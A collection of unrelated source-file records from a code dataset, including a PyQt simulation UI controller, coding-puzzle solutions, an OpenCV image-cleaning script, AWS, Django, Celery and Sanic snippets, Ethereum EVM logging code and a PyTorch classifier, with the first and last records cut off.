False))\n\n def setRegenEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.regenCheckBoxTrue = checkboxTrue\n self.regenCheckBoxFalse = checkboxFalse\n self.setRegenEnabled()\n\n def setRegenEnabled(self) :\n isOn = self.settings[\"EpithelialSystem\"][\"bRegenEnabled\"]\n self.regenCheckBoxTrue.setChecked(isOn)\n self.regenCheckBoxFalse.setChecked((isOn == False))\n\n def setRandomAgeEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.randomAgeCheckBoxTrue = checkboxTrue\n self.randomAgeCheckBoxFalse = checkboxFalse\n self.setRandomAgeEnabled()\n\n def setRandomAgeEnabled(self) :\n isOn = self.settings[\"EpithelialSystem\"][\"bRandomAge\"]\n self.randomAgeCheckBoxTrue.setChecked(isOn)\n self.randomAgeCheckBoxFalse.setChecked((isOn == False))\n\n def setInfectInitInput(self, textbox) :\n self.infectInitTextBox = textbox\n self.setInfectInit()\n\n def setInfectInit(self) :\n value = self.settings[\"EpithelialSystem\"][\"fInfectInit\"]\n self.infectInitTextBox.setText(str(value))\n\n def setInfectRateInput(self, textbox) :\n self.infectRateTextBox = textbox\n self.setInfectRate()\n\n def setInfectRate(self) :\n value = self.settings[\"EpithelialCell\"][\"fInfectRate\"]\n self.infectRateTextBox.setText(str(value))\n\n def setDivisionTimeInput(self, textbox) :\n self.divisionTimeTextBox = textbox\n self.setDivisionTime()\n\n def setDivisionTime(self) :\n value = self.settings[\"EpithelialCell\"][\"iDivisionTime\"]\n self.divisionTimeTextBox.setText(str(value))\n\n def setInfectDelayInput(self, textbox) :\n self.infectDelayTextBox = textbox\n self.setInfectDelay()\n\n def setInfectDelay(self) :\n value = self.settings[\"EpithelialCell\"][\"iInfectDelay\"]\n self.infectDelayTextBox.setText(str(value))\n\n def setExpressDelayInput(self, textbox) :\n self.expressDelayTextBox = textbox\n self.setExpressDelay()\n\n def setExpressDelay(self) :\n value = self.settings[\"EpithelialCell\"][\"iExpressDelay\"]\n self.expressDelayTextBox.setText(str(value))\n\n def setECellLifespanInput(self, textbox) :\n self.eCellLifespanTextBox = textbox\n self.setECellLifespan()\n\n def setECellLifespan(self) :\n value = self.settings[\"EpithelialCell\"][\"iEpithelialLifespan\"]\n self.eCellLifespanTextBox.setText(str(value))\n\n def setInfectLifespanInput(self, textbox) :\n self.infectLifespanTextBox = textbox\n self.setInfectLifespan()\n\n def setInfectLifespan(self) :\n value = self.settings[\"EpithelialCell\"][\"iInfectLifespan\"]\n self.infectLifespanTextBox.setText(str(value))\n\n #def setFocusDebugTextEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n # self.focusDebugTextCheckBoxTrue = checkboxTrue\n # self.focusDebugTextCheckBoxFalse = checkboxFalse\n # self.setFocusDebugTextEnabled()\n\n #def setFocusDebugTextEnabled(self) :\n # isOn = self.settings[\"FocusSystem\"][\"bDebugTextEnabled\"]\n # self.focusDebugTextCheckBoxTrue.setChecked(isOn)\n # self.focusDebugTextCheckBoxFalse.setChecked((isOn == False)) \n\n def setMergeCollisionsInput(self, textbox) :\n self.mergeCollisionsTextBox = textbox\n self.setMergeCollisions()\n\n def setMergeCollisions(self) :\n value = self.settings[\"FocusSystem\"][\"iCollisionsForMergePercentage\"]\n self.mergeCollisionsTextBox.setText(str(value))\n\n def setFocusSysEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.focusSysEnabledCheckBoxTrue = checkboxTrue\n self.focusSysEnabledCheckBoxFalse = checkboxFalse\n self.setFocusSysEnabled()\n\n def setFocusSysEnabled(self) :\n isOn = self.settings[\"FocusSystem\"][\"bIsEnabled_FocusSys\"]\n self.focusSysEnabledCheckBoxTrue.setChecked(isOn)\n self.focusSysEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n def setBaseImmCellsInput(self, textbox) :\n self.baseImmCellsTextBox = textbox\n self.setBaseImmCells()\n\n def setBaseImmCells(self) :\n value = self.settings[\"ImmuneSystem\"][\"fBaseImmCell\"]\n self.baseImmCellsTextBox.setText(str(value))\n\n def setRecruitmentInput(self, textbox) :\n self.recruitmentTextBox = textbox\n self.setRecruitment()\n\n def setRecruitment(self) :\n value = self.settings[\"ImmuneSystem\"][\"fRecruitment\"]\n self.recruitmentTextBox.setText(str(value))\n\n def setRecruitDelayInput(self, textbox) :\n self.recruitDelayTextBox = textbox\n self.setRecruitDelay()\n\n def setRecruitDelay(self) :\n value = self.settings[\"ImmuneSystem\"][\"iRecruitDelay\"]\n self.recruitDelayTextBox.setText(str(value))\n\n def setImmSysEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.immSysEnabledCheckBoxTrue = checkboxTrue\n self.immSysEnabledCheckBoxFalse = checkboxFalse\n self.setImmSysEnabled()\n\n def setImmSysEnabled(self) :\n isOn = self.settings[\"ImmuneSystem\"][\"bIsEnabled_ImmSys\"]\n self.immSysEnabledCheckBoxTrue.setChecked(isOn)\n self.immSysEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n def setImmCellLifespanInput(self, textbox) :\n self.immCellLifespanTextBox = textbox\n self.setImmCellLifespan()\n\n def setImmCellLifespan(self) :\n value = self.settings[\"ImmuneCell\"][\"iImmuneLifespan\"]\n self.immCellLifespanTextBox.setText(str(value))\n\n def setSnapshotWidthInput(self, textbox) :\n self.snapshotWidthTextBox = textbox\n self.setSnapshotWidth()\n\n def setSnapshotWidth(self) :\n value = self.settings[\"SimulationVisualisation\"][\"iSnapshotWidth\"]\n self.snapshotWidthTextBox.setText(str(value))\n\n def setSnapshotHeightInput(self, textbox) :\n self.snapshotHeightTextBox = textbox\n self.setSnapshotHeight()\n\n def setSnapshotHeight(self) :\n value = self.settings[\"SimulationVisualisation\"][\"iSnapshotHeight\"]\n self.snapshotHeightTextBox.setText(str(value))\n\n def setSquareSizeInput(self, textbox) :\n self.squareSizeTextBox = textbox\n self.setSquareSize()\n\n def setSquareSize(self) :\n value = self.settings[\"SimulationVisualisation\"][\"iSquareSize\"]\n self.squareSizeTextBox.setText(str(value))\n\n #def setFocusIdsCheckBox(self, checkboxTrue, checkboxFalse) :\n # self.focusIdsCheckBoxTrue = checkboxTrue\n # self.focusIdsCheckBoxFalse = checkboxFalse\n # self.setFocusIds()\n\n #def setFocusIds(self) :\n # isOn = self.settings[\"SimulationVisualisation\"][\"bDebugFocusIdEnabled\"]\n # self.focusIdsCheckBoxTrue.setChecked(isOn)\n # self.focusIdsCheckBoxFalse.setChecked((isOn == False)) \n\n def setSnapshotEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.snapshotEnabledCheckBoxTrue = checkboxTrue\n self.snapshotEnabledCheckBoxFalse = checkboxFalse\n self.setSnapshotEnabled()\n\n def setSnapshotEnabled(self) :\n isOn = self.settings[\"SimulationVisualisation\"][\"bSnapshotEnabled\"]\n self.snapshotEnabledCheckBoxTrue.setChecked(isOn)\n self.snapshotEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n def setSimVisEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.simVisEnabledCheckBoxTrue = checkboxTrue\n self.simVisEnabledCheckBoxFalse = checkboxFalse\n self.setSimVisEnabled()\n\n def setSimVisEnabled(self) :\n isOn = self.settings[\"SimulationVisualisation\"][\"bIsEnabled_SimVis\"]\n self.simVisEnabledCheckBoxTrue.setChecked(isOn)\n self.simVisEnabledCheckBoxFalse.setChecked((isOn == False)) \n\n #def setHighlightCollisionsCheckBox(self, checkboxTrue, checkboxFalse) :\n # self.highlightCollisionsCheckBoxTrue = checkboxTrue\n # self.highlightCollisionsCheckBoxFalse = checkboxFalse\n # self.setHighlightCollisions()\n\n #def setHighlightCollisions(self) :\n # isOn = self.settings[\"SimulationVisualisation\"][\"bHighlightCollisions\"]\n # self.highlightCollisionsCheckBoxTrue.setChecked(isOn)\n # self.highlightCollisionsCheckBoxFalse.setChecked((isOn == False)) \n\n def setShowGraphCheckBox(self, checkboxTrue, checkboxFalse) :\n self.showGraphCheckBoxTrue = checkboxTrue\n self.showGraphCheckBoxFalse = checkboxFalse\n self.setShowGraph()\n\n def setShowGraph(self) :\n isOn = self.settings[\"Graph\"][\"bShowGraphOnFinish\"]\n self.showGraphCheckBoxTrue.setChecked(isOn)\n self.showGraphCheckBoxFalse.setChecked((isOn == False)) \n\n def setConsole(self, console) :\n \"\"\"\n Set the console (text area) so that logs can be written to it\n \"\"\"\n self.console = console\n Log.setConsole(console)","sub_path":"InfluenzaVirusModel/InfluenzaVirusModel/UIController.py","file_name":"UIController.py","file_ext":"py","file_size_in_byte":20062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320415914","text":"import simpleDali\nimport simpleMiniseed\nimport asyncio\nimport json\nimport logging\nfrom datetime import datetime, timedelta\nfrom array import array\n\nlogging.basicConfig(level=logging.DEBUG)\n\nhost = \"129.252.35.36\"\nport = 15003\n#host = \"127.0.0.1\"\n#host = \"129.252.35.20\"\n#port = 6382\nuri = \"ws://www.seis.sc.edu/dragracews/datalink\"\n\nprogramname=\"simpleDali\"\nusername=\"dragrace\"\nprocessid=0\narchitecture=\"python\"\n\n\nasync def doTest(loop):\n dali = simpleDali.SocketDataLink(host, port)\n serverId = await dali.id(programname, username, processid, architecture)\n print(\"Resp: {}\".format(serverId))\n #serverInfo = yield from dali.info(\"STATUS\")\n #print(\"Info: {} \".format(serverInfo.message))\n #serverInfo = yield from dali.info(\"STREAMS\")\n #print(\"Info: {} \".format(serverInfo.message))\n network = \"YY\"\n station = \"TEST\"\n location = \"00\"\n channel = \"HNZ\"\n trigtime = simpleDali.utcnowWithTz()\n\n streamid = \"{}.{}.{}.{}/MTRIG\".format(network, station, location, channel)\n hpdatastart = int(trigtime.timestamp() * simpleDali.MICROS)\n hpdataend = int(trigtime.timestamp() * simpleDali.MICROS)\n trigInfo= {\n \"type\": \"stalta\",\n \"time\": trigtime.isoformat(),\n \"network\": network,\n \"station\": station,\n \"location\": location,\n \"channel\": channel,\n \"sta\": 62,\n \"lta\": 418,\n \"creation\": trigtime.isoformat(),\n \"override\": {\n \"modtime\": trigtime.isoformat(),\n \"value\": \"enable\"\n }\n }\n trigBytes = json.dumps(trigInfo).encode('UTF-8')\n r = await dali.writeAck(streamid, hpdatastart, hpdataend, trigBytes)\n print(\"writem trigger resp {}\".format(r));\n await dali.close()\n\n\nloop = asyncio.get_event_loop()\nloop.set_debug(True)\nloop.run_until_complete(doTest(loop))\nloop.close()\n","sub_path":"python/autoTrigger.py","file_name":"autoTrigger.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"440043046","text":"#! python\nimport sys\nimport math\nimport euler\nimport itertools\n\ndef main():\n primes = []\n max_primes = []\n max_prime = 0\n\n limit = 1000000\n for i in range(1, limit):\n if euler.is_prime(i):\n primes.append(i)\n\n begin = 0\n end = begin + 1\n while begin < len(primes) - 1 and end < len(primes):\n p = primes[begin:end]\n s = sum(p)\n if s < limit:\n if euler.is_prime(s) and len(p) > len(max_primes):\n max_primes = p\n max_prime = s\n end += 1\n else:\n begin += 1\n end = begin + 1\n print(max_prime)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"p50.py","file_name":"p50.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"624605848","text":"#!/bin/python3\nimport sys\nimport itertools\n\n\ndef is_beautiful(s):\n \"\"\"\n Are the splits in `s` beautiful?\n \"\"\"\n leading_zeros = [d[0] == '0' for d in s]\n increasing = [int(s[i - 1]) + 1 == int(s[i]) for i in range(1, len(s))]\n res = not any(leading_zeros) and all(increasing)\n if res: # match, look for index\n return (res, s[0])\n else:\n return (res, None)\n\n\ndef separate_string(s, index):\n \"\"\"\n :param s: \n :param index: indices at which to split the string \n :return: \n >>> separate_string('abcd', [1, 2])\n ['ab', 'c', 'd']\n >>> separate_string('abcd', [0])\n ['a', 'bcd']\n \"\"\"\n # string from start to first index, rest of indices, then from last index til the end\n # 'abcdefgh', [0, 3] -> Split after 0, and after 3\n # 'a', 'bcd', ...\n # print(s[:index[0] + 1])\n # s_list = [s[:index[0]]]\n # s_list = [s[:index[0] + 1]]\n s_list = [(s[:index[0] + 1])] + \\\n [s[index[i] + 1: index[i + 1] + 1] for i in range(len(index) - 1)] + \\\n [s[index[-1] + 1:]]\n # s_list.extend([s[index[i] + 1: index[i + 1] + 1] for i in range(len(index) - 1)])\n # s_list.append(s[index[-1] + 1:])\n\n return s_list\n\n\ndef get_indices(s):\n \"\"\"\n Gets all combinations of indices after which to split the string `s`\n \n e.g. \"abc\" -> [[0, 1], [1]] means split \"abc\" after index 0 and 1, or after index 1\n \n :param s: string to split \n :return: list of list of indices at which to split `s`\n >>> get_indices('abc')\n \"\"\"\n bin_strings = itertools.product([True, False], repeat=len(s) - 1)\n position_list = []\n for bin_str in bin_strings:\n position_list.append([index for index, bool in enumerate(bin_str) if bool])\n return [p for p in position_list if len(p) > 0]\n\n\nq = int(input().strip())\nfor a0 in range(q):\n s = input().strip()\n indices = get_indices(s)\n li = [separate_string(s, i) for i in indices]\n res = False\n is_beautiful_res = [is_beautiful(l) for l in li]\n if len(is_beautiful_res) > 0:\n is_beautiful_bool, first_digit_list = zip(*is_beautiful_res)\n try:\n match_index = is_beautiful_bool.index(True)\n print('YES %s' % first_digit_list[match_index])\n except ValueError:\n print('NO')\n else:\n print('NO')\n # print('YES' if any([r[0] for r in is_beautiful_res]) else 'NO')\n","sub_path":"hackerrank/src/algorithms/strings/separate_the_numbers.py","file_name":"separate_the_numbers.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"556236231","text":"#!/usr/bin/python3\n#/////////////////////////////////////////////////////////////////////////////////////////\n#///////////////////////////////////// Dictionaries ///////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n\nnames_human = [\"Koorosh\", \"Morgane\", \"Pauline\", \"Justin\", \"Megan\", \"Till\", \"Marianna\", \"Borin\", \"Katherine\", \"Lee\", \"Anastasia\", \"Shyam\", \"Salona\", \"Estragon\", \"Vladimir\", \"Pozzo\", \"Godot\", \"Lucky\", \"Gary\"]\nnames_artists = {\"janis joplin\": \"singer\", \"william turner\": \"painter\", \"pier paolo pasolini\": \"film director\"}\nnames_cars = [\"Bugatti\", \"BMW\", \"Peykan\", \"Renault\", \"Mercedes-Benz\", \"Peugeot\", \"Citroen\", \"Alpine\"]\nnames_computers = [\"Altaire 8800\", \"IBM 610\", \"Kenbak-1\", \"MIR\", \"Datapoint 202\", \"Simon\", \"Micral N\"]\nuser1_info = {\"fname\":\"Grace\", \"lname\":\"Hopper\"}\nuser2_info = {\"fname\":\"mike\", \"lname\":\"Muuss\"}\nuser3_info = {\"fname\":\"Dennis\", \"lname\":\"Ritchie\"}\nuser4_info = {\"fname\":\"Ken\", \"lname\":\"Thompson\"}\ncar = {\"Window\": 4, \"Wheel\": 4, \"Antenna\": 1, \"Wheel\": 40}\n\n\n\n### How is a function written and called?\n# def welcome():\n# \tfor name in names_human:\n# \t\tprint(\"Hello {0} and welcome!\".format(name))\n# welcome()\n\n\n\n### How to pass information to a function\n# def welcome(name):\n# \tprint(\"Hello {0} and welcome!\".format(name))\n# for name in names_human:\n# \twelcome(name)\n\n\n\n### How to use positional arguments\n# name = \"Estragon\"\n# car = names_cars[0]\n# def friends_news(name, car):\n# \tprint(\"{0} has just bought a new {1}.\".format(name.upper(), car.upper()))\n# friends_news(name, car)\n\n\n\n### What are keyword arguments?\n### You do not need to pass keyword arguments in order\n# name = \"Estragon\"\n# car = names_cars[0]\n# def friends_news(person_name, person_car):\n# \tprint(\"{0} has just bought a new {1}.\".format(name.upper(), car.upper()))\n# friends_news(person_name = name, person_car = car)\n\n\n\n### How to use default values for arguments?\n# def animal_care(name, action = \"Feeding\"):\n# \tprint(\"Action to be taken on {0} is: {1}.\".format(name, action))\n# animal_care(\"Puppy\", \"Grooming\")\n# animal_care(\"caty\")\n# animal_care(\"Piggy\", \"Washing\")\n\n\n\n### How does retutn value work in python?\n# def artist(name, style):\n# \tartist_description = name.title() + \" was a \" + style.title() + \".\"\n# \treturn artist_description\n# for name, style in names_artists.items():\n# \tresult = artist(name, style)\n# \tprint(result)\n\n\n\n### Pass a list to a function\n### In this way, by making any changes to the username list,\n### the original names_human will also change\n# names = names_human\n# def greet_users(names):\n# \tfor name in names:\n# \t\tmsg = \"Hello, \" + name.title() + \"!\"\n# \t\tprint(msg)\n# greet_users(names)\n\n\n\n### Pass a list to a function without changing\n### the original list at later times by passing a copy of it\n### a copy of it to the function\n# names = names_human[:]\n# def greet_users(names):\n# \tfor name in names:\n# \t\tmsg = \"Hello, \" + name.title() + \"!\"\n# \t\tprint(msg)\n# greet_users(names)\n\n\n\n### Passing an unknown number of arguments\n# def account(*payments):\n# \ttransactions = []\n\n# \t\"\"\"Receiving the list of transactions\"\"\"\n# \tfor payment in payments:\n# \t\ttransactions.append(payment)\n\t\n# \t\"\"\"Calculating the account's balance\"\"\"\n# \tbalance = 0\n# \tfor amount in transactions:\n# \t\tbalance += amount\n\t\n# \t\"\"\"Printing the list of transactions\"\"\"\n# \tprint(\"The list of incomes and payments: \")\n# \tfor transaction in transactions:\n# \t\tprint(\"\\t{0}\".format(transaction))\n\n# \t\"\"\"Printing the balance\"\"\"\n# \tprint(\"\\nThe balance of your account:\\n\\t{0}$\\n\".format(balance))\n\n# account(27000, 30000, -26000)\n\n\n\n\n### How to put a function in a module and call it\n### the modules.py is include in the same folder\n# import modules\n# name = \"Zaza\"\n# modules.greet_people(name)\n\n\n### What is a .pyc file\n### This description comes from the link below:\n### https://www.tutorialspoint.com/What-are-pyc-files-in-Python\n# .pyc files are created by the Python interpreter when a .py file is imported.\n# They contain the \"compiled bytecode\" of the imported module/program so that\n# the \"translation\" from source code to bytecode (which only needs to be done once) \n# can be skipped on subsequent imports if the .pyc is newer than the corresponding .py file,\n# thus speeding startup a little. But it's still interpreted. \n# Once the *.pyc file is generated, there is no need of *.py file, unless you edit it.\n\n\n\n### How to correctly call a function that is written in a module\n# WHEN IMPORTING, CONSIDER THE FACT THAT IMPORTING THE ENTIRE MODULE IS DONE BY IMPORTING\n# ITS FILENAME. THIS MODULE MIGHT CONTAIN A METHOD AS THE NAME AS THE MODULE ITSELF. \n# AS A RESULT, DO NOT FORGET TO USE THE METHOD AS THE FOLLOWING WAYS:\n# 1)\tIf importing the whole method:\n# \t\tExample:\n# \t\timport pprint\n# \t\tpprint.pprint(myDict)\n# 2)\tIf importing the method from module:\n# \t\tExample:\n# \t\tfrom pprint import pprint\n# \t\tpprint(myDict)\n\n\n\n### How to use `as` to give a function an alias\n# import modules as m\n# name = \"Zaza\"\n# m.greet_people(name)\n\n\n\n### How to import all functions located in a module\n# from modules import *\n# name = \"Zaza\"\n# greet_people(name)\n# farewell_people(name)\n\n\n\n","sub_path":"python/5 - Functions/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"571346797","text":"\"\"\"\nauthor: wiken\nDate:2019/6/3\n\"\"\"\n\nimport cv2 as cv\nimport time\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\nname_lst = os.listdir(\"./pic\")\nfor i in name_lst:\n if \".\" in i:\n # print(i)\n n = f'./pic/{i}'\n img = cv.imread(n)\n img2 = img.copy()\n h, w, c = img.shape\n # img = cv.GaussianBlur(img,(3,3),0)\n c1 = img[1, 1, 0]\n c2 = img[1, 1, 1]\n c3 = img[1, 1, 2]\n\n\n for c_ in range(c):\n if c_ == 0:\n cx = c1\n elif c_ == 1:\n cx = c2\n elif c_ == 2:\n cx = c3\n # print(cx, \"ss\")\n for h_ in range(h):\n for w_ in range(w):\n\n if cx-20 < img2[h_, w_, c_] < cx+20:\n img2[h_, w_, c_] = 0\n if img2[h_, w_, c_] > 190:\n img2[h_, w_, c_] = 0\n # gaus = cv.GaussianBlur(img2,(3,3),0)\n blured = cv.medianBlur(img2, 5)\n gaus = cv.GaussianBlur(blured,(3,3), 3, 0)\n cv.imshow(\"sss\", img2)\n gray = cv.cvtColor(gaus, cv.COLOR_BGR2GRAY)\n r, b = cv.threshold(gray, 0, 255,cv.THRESH_BINARY_INV + cv.THRESH_OTSU)\n name = f'./pic/dealed/{str(int(time.time()*1000))}.png'\n cv.imwrite(name, b)\n print(\"over\")\n # cv.imshow(\"ss\", b)\n # cv.waitKey(0)\n\n\n\n\n\n\n\n\n","sub_path":"my_opencv/p3_chinese_crack/package/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"380615246","text":"import json\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nSECRET_NAME_DATABASE = 'DatabaseCredentials'\nSECRET_NAME_AUTH0 = 'Auth0Secrets'\nSECRET_NAME_FLASK = 'FlaskSecrets'\n\nSECRET_STRING_DATABASE_HOST = 'db_host'\nSECRET_STRING_DATABASE_NAME = 'db_name'\nSECRET_STRING_DATABASE_USERNAME = 'db_username'\nSECRET_STRING_DATABASE_PASSWORD = 'db_password'\nSECRET_STRING_AUTH0_CLIENT_ID = 'client_id'\nSECRET_STRING_AUTH0_CLIENT_SECRET = 'client_secret'\nSECRET_STRING_AUTH0_API_BASE_URL = 'api_base_url'\nSECRET_STRING_FLASK_SECRET_KEY = 'secret_key'\n\n\nclass SecretsManager:\n \"\"\"Encapsulates Secrets Manager functions.\"\"\"\n\n def __init__(self):\n self.secretsmanager_client = boto3.client('secretsmanager')\n\n def get_value(self, name):\n \"\"\"\n Gets the value of a secret.\n\n :param name: The name of the secret to retrieve\n :return: The value of the secret. When the secret is a string, the value is\n contained in the `SecretString` field. When the secret is bytes,\n it is contained in the `SecretBinary` field.\n \"\"\"\n if name is None:\n raise ValueError\n\n try:\n kwargs = {'SecretId': name}\n response = self.secretsmanager_client.get_secret_value(**kwargs)\n except ClientError as e:\n return None\n else:\n return json.loads(response.get('SecretString'))\n","sub_path":"app/utils/secrets_manager.py","file_name":"secrets_manager.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"174063306","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\n\r\n# Create your models here.\r\nfrom django.utils.text import slugify\r\n\r\n\r\nclass Task(models.Model):\r\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\r\n title = models.CharField(max_length=200, null=True, blank=True)\r\n description = models.TextField(null=True, blank=True)\r\n complete = models.BooleanField(default=False)\r\n create = models.DateTimeField(auto_now_add=True)\r\n slug = models.SlugField(blank=True, null=True)\r\n\r\n def save(self, *args, **kwargs):\r\n self.slug = slugify(self.title)\r\n super(Task, self).save(*args, **kwargs)\r\n\r\n def __str__(self):\r\n return self.title\r\n\r\n class Meta:\r\n ordering = ['complete']\r\n","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"86029314","text":"\nfrom __future__ import absolute_import\nimport os\nfrom celery.schedules import crontab\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'useMongo.settings')\nfrom celery.contrib import rdb\n\nfrom django.conf import settings\nfrom celery import Celery\n\napp = Celery()\n\n# This reads, e.g., CELERY_ACCEPT_CONTENT = ['json'] from settings.py:\napp.config_from_object('django.conf:settings')\n\n# For autodiscover_tasks to work, you must define your tasks in a file called 'tasks.py'.\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\n@app.task(bind=True)\ndef debug_task(self):\n print(\"Request: {0!r}\".format(self.request))\n\napp.conf.beat_schedule = {\n 'add-every-monday-morning': {\n 'task': 'fanpages.tasks.crontab_get_posts',\n 'schedule': crontab(hour=17, minute=0),\n },\n}\n\napp.conf.timezone = 'UTC'\n","sub_path":"useMongo/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"510809308","text":"\"\"\"\nEthereum Virtual Machine (EVM) Logging Instructions\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n.. contents:: Table of Contents\n :backlinks: none\n :local:\n\nIntroduction\n------------\n\nImplementations of the EVM logging instructions.\n\"\"\"\nfrom functools import partial\n\nfrom ethereum.base_types import U256\n\nfrom ...fork_types import Log\nfrom .. import Evm\nfrom ..gas import (\n GAS_LOG,\n GAS_LOG_DATA,\n GAS_LOG_TOPIC,\n calculate_gas_extend_memory,\n charge_gas,\n)\nfrom ..memory import memory_read_bytes\nfrom ..stack import pop\n\n\ndef log_n(evm: Evm, num_topics: U256) -> None:\n \"\"\"\n Appends a log entry, having `num_topics` topics, to the evm logs.\n\n This will also expand the memory if the data (required by the log entry)\n corresponding to the memory is not accessible.\n\n Parameters\n ----------\n evm :\n The current EVM frame.\n num_topics :\n The number of topics to be included in the log entry.\n\n \"\"\"\n # STACK\n memory_start_index = pop(evm.stack)\n size = pop(evm.stack)\n\n topics = []\n for _ in range(num_topics):\n topic = pop(evm.stack).to_be_bytes32()\n topics.append(topic)\n\n # GAS\n extend_memory = calculate_gas_extend_memory(\n evm.memory, [(memory_start_index, size)]\n )\n charge_gas(\n evm,\n GAS_LOG\n + GAS_LOG_DATA * size\n + GAS_LOG_TOPIC * num_topics\n + extend_memory.cost,\n )\n\n # OPERATION\n evm.memory += b\"\\x00\" * extend_memory.expand_by\n log_entry = Log(\n address=evm.message.current_target,\n topics=tuple(topics),\n data=memory_read_bytes(evm.memory, memory_start_index, size),\n )\n\n evm.logs = evm.logs + (log_entry,)\n\n # PROGRAM COUNTER\n evm.pc += 1\n\n\nlog0 = partial(log_n, num_topics=0)\nlog1 = partial(log_n, num_topics=1)\nlog2 = partial(log_n, num_topics=2)\nlog3 = partial(log_n, num_topics=3)\nlog4 = partial(log_n, num_topics=4)\n","sub_path":"src/ethereum/dao_fork/vm/instructions/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"461807183","text":"import torch as tc\nimport numpy as np\n\n\nclass ResBlock(tc.nn.Module):\n def __init__(self, filters):\n super(ResBlock, self).__init__()\n self.conv_sequence = tc.nn.Sequential(\n tc.nn.Conv2d(filters, filters, (3,3), stride=(1,1), padding=(1,1)),\n tc.nn.BatchNorm2d(filters),\n tc.nn.ReLU(),\n tc.nn.Conv2d(filters, filters, (3,3), stride=(1,1), padding=(1,1)),\n tc.nn.BatchNorm2d(filters)\n )\n\n def forward(self, x):\n return tc.nn.ReLU()(x + self.conv_sequence(x))\n\n\nclass DownsamplingConvBlock(tc.nn.Module):\n def __init__(self, input_channels, output_channels):\n super(DownsamplingConvBlock, self).__init__()\n self.stack = tc.nn.Sequential(\n tc.nn.Conv2d(input_channels, output_channels, (4,4), stride=(2,2), padding=(1,1)),\n tc.nn.ReLU(),\n ResBlock(output_channels)\n )\n\n def forward(self, x):\n return self.stack(x)\n\n\nclass SmallConvNetClassifier(tc.nn.Module):\n def __init__(self, img_height, img_width, img_channels, num_filters, num_classes):\n super(SmallConvNetClassifier, self).__init__()\n self.img_height = img_height\n self.img_width = img_width\n self.img_channels = img_channels\n self.num_filters = num_filters\n self.num_classes = num_classes\n self.conv_stack = tc.nn.Sequential(\n DownsamplingConvBlock(img_channels, num_filters),\n DownsamplingConvBlock(num_filters, num_filters),\n DownsamplingConvBlock(num_filters, num_filters)\n )\n self.num_conv_features = (img_height // 8) * (img_width // 8) * num_filters\n self.fc = tc.nn.Linear(self.num_conv_features, self.num_classes)\n\n def forward(self, x):\n spatial_features = self.conv_stack(x)\n flat_features = tc.reshape(spatial_features, (-1, self.num_conv_features))\n logits = self.fc(flat_features)\n return logits\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"88324315","text":"from sanic import Sanic\nfrom sanic import response\nfrom sanic.config import Config\nfrom sanic.exceptions import RequestTimeout,NotFound\nimport configparser\n\nimport logging\nfrom logging import handlers\nimport socket\nfrom datetime import datetime\nimport requests\n\nimport asyncio\nimport uvloop\nimport aiomysql\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nloop = asyncio.get_event_loop()\n\n\n\n#routing_key = \"queue name\"\n\napp = Sanic(__name__)\n# remove logo\napp.config.LOGO = None\nConfig.REQUEST_TIMEOUT = 60\n\n\n \ndef jsonify(records):\n \"\"\"\n Parse aiomysql record response into JSON format\n \"\"\"\n #print(records)\n list_return = []\n \n for r in records:\n itens = r.items()\n list_return.append({i[0]:i[1].rstrip() if type(i[1])==str else i[1] for i in itens})\n return list_return \n\n@app.exception(RequestTimeout)\ndef timeout(request, exception): \n return response.text('RequestTimeout from error_handler.', 408)\n\n@app.exception(NotFound)\ndef not_found(request, exception):\n \"\"\"remove error for favicon.ico\"\"\"\n\n if \"favicon.ico\" in str(exception):\n return response.text('icon does not exists', 404)\n else:\n return response.text('Route does not exists', 404)\n \n@app.listener('before_server_start')\nasync def register_log(app, loop):\n # Create a database connection pool\n app.config['pool'] = await aiomysql.create_pool(host='127.0.0.1', port=3306,\n user='root', password='root',\n db='tcgplace', 